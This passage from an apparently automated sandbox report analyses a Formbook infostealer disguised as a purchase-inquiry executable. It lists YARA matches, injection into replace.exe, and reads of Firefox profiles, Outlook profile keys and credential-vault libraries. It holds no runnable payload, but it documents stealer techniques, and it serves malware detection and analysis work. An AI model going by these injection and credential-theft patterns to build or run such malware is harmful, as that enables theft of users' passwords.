                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_03313A6C21_2_03313A6C
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_03357A4621_2_03357A46
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0335FA4921_2_0335FA49
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032E5AA021_2_032E5AA0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_03341AA321_2_03341AA3
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0333DAAC21_2_0333DAAC
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0334DAC621_2_0334DAC6
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0333591021_2_03335910
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032A995021_2_032A9950
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032BB95021_2_032BB950
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0330D80021_2_0330D800
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032A38E021_2_032A38E0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0335FF0921_2_0335FF09
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0335FFB121_2_0335FFB1
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032A1F9221_2_032A1F92
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032A9EB021_2_032A9EB0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_03357D7321_2_03357D73
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032A3D4021_2_032A3D40
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_03351D5A21_2_03351D5A
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_032BFDC021_2_032BFDC0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_03319C3221_2_03319C32
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0335FCF221_2_0335FCF2
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_029416D021_2_029416D0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0295A1E021_2_0295A1E0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0293CAB021_2_0293CAB0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0293AB3021_2_0293AB30
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0293C89021_2_0293C890
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0293C88721_2_0293C887
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0294323021_2_02943230
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0294322B21_2_0294322B
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: String function: 00F27E54 appears 102 times
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: String function: 00F5F290 appears 105 times
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: String function: 00ECB970 appears 277 times
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: String function: 00F15130 appears 58 times
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: String function: 00F4EA12 appears 86 times
                Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 0331F290 appears 105 times
                Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 032D5130 appears 58 times
                Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 0330EA12 appears 86 times
                Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 0328B970 appears 277 times
                Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 032E7E54 appears 106 times
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 1380
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exeStatic PE information: invalid certificate
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, 00000000.00000002.1440616018.000000000B800000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs INQ No. HDPE-16-GM-00- PI-INQ-3001.exe
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, 00000000.00000002.1439262687.0000000007CE2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs INQ No. HDPE-16-GM-00- PI-INQ-3001.exe
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, 00000000.00000002.1434719451.00000000014BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs INQ No. HDPE-16-GM-00- PI-INQ-3001.exe
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, 00000000.00000000.1202863988.0000000000F28000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNfo.exe& vs INQ No. HDPE-16-GM-00- PI-INQ-3001.exe
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, 00000004.00000002.1483046509.0000000000A48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameREPLACE.EXEj% vs INQ No. HDPE-16-GM-00- PI-INQ-3001.exe
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, 00000004.00000002.1483417927.0000000000FCD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs INQ No. HDPE-16-GM-00- PI-INQ-3001.exe
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exeBinary or memory string: OriginalFilenameNfo.exe& vs INQ No. HDPE-16-GM-00- PI-INQ-3001.exe
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 4.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 4.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000016.00000002.3686434671.00000000058F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000015.00000002.3676564826.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000004.00000002.1483242441.0000000000E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000004.00000002.1482586968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000015.00000002.3683794972.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000015.00000002.3683904439.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000014.00000002.3683910951.0000000003AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000004.00000002.1485407481.0000000002790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.91b0000.6.raw.unpack, V4uC3Iifq56IKQcfry.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.91b0000.6.raw.unpack, V4uC3Iifq56IKQcfry.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4219970.3.raw.unpack, V4uC3Iifq56IKQcfry.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4219970.3.raw.unpack, V4uC3Iifq56IKQcfry.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, unTi9rbmXOPJ0aSMYW.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, unTi9rbmXOPJ0aSMYW.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, unTi9rbmXOPJ0aSMYW.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, unTi9rbmXOPJ0aSMYW.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, unTi9rbmXOPJ0aSMYW.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, unTi9rbmXOPJ0aSMYW.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, QIxXUl9ykF6i6XwVuL.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.b800000.7.raw.unpack, QIxXUl9ykF6i6XwVuL.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, unTi9rbmXOPJ0aSMYW.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, unTi9rbmXOPJ0aSMYW.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4eb0a70.2.raw.unpack, unTi9rbmXOPJ0aSMYW.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, QIxXUl9ykF6i6XwVuL.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.3498340.1.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.77b0000.5.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.3487ce0.0.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/7@18/11
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.logJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6188
                Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\6a6fb55e-66f1-4fa4-bed9-d1f5f149b05eJump to behavior
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: replace.exe, 00000015.00000003.1668525834.0000000002E2A000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000015.00000002.3680182899.0000000002E58000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000015.00000003.1670794835.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000015.00000002.3680182899.0000000002E2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exeReversingLabs: Detection: 31%
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exeVirustotal: Detection: 50%
                Source: unknownProcess created: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe "C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe"
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess created: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe "C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe"
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess created: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe "C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe"
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 1380
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeProcess created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"
                Source: C:\Windows\SysWOW64\replace.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess created: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe "C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe"Jump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess created: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe "C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe"Jump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeProcess created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\replace.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: System.Data.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Configuration.pdbL0vw# source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Xml.ni.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: Accessibility.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.ni.pdbRSDS source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: Nfo.pdb/l source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: wntdll.pdbUGP source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000015.00000003.1482858607.0000000002EEF000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000015.00000002.3684257508.00000000033FE000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000015.00000002.3684257508.0000000003260000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000015.00000003.1484866148.00000000030B9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Nfo.pdbSHA256 source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe
                Source: Binary string: wntdll.pdb source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, replace.exe, replace.exe, 00000015.00000003.1482858607.0000000002EEF000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000015.00000002.3684257508.00000000033FE000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000015.00000002.3684257508.0000000003260000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000015.00000003.1484866148.00000000030B9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Configuration.ni.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: mscorlib.ni.pdbRSDS source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Data.ni.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Configuration.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Xml.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Xml.ni.pdbRSDS# source: WER20C2.tmp.dmp.7.dr
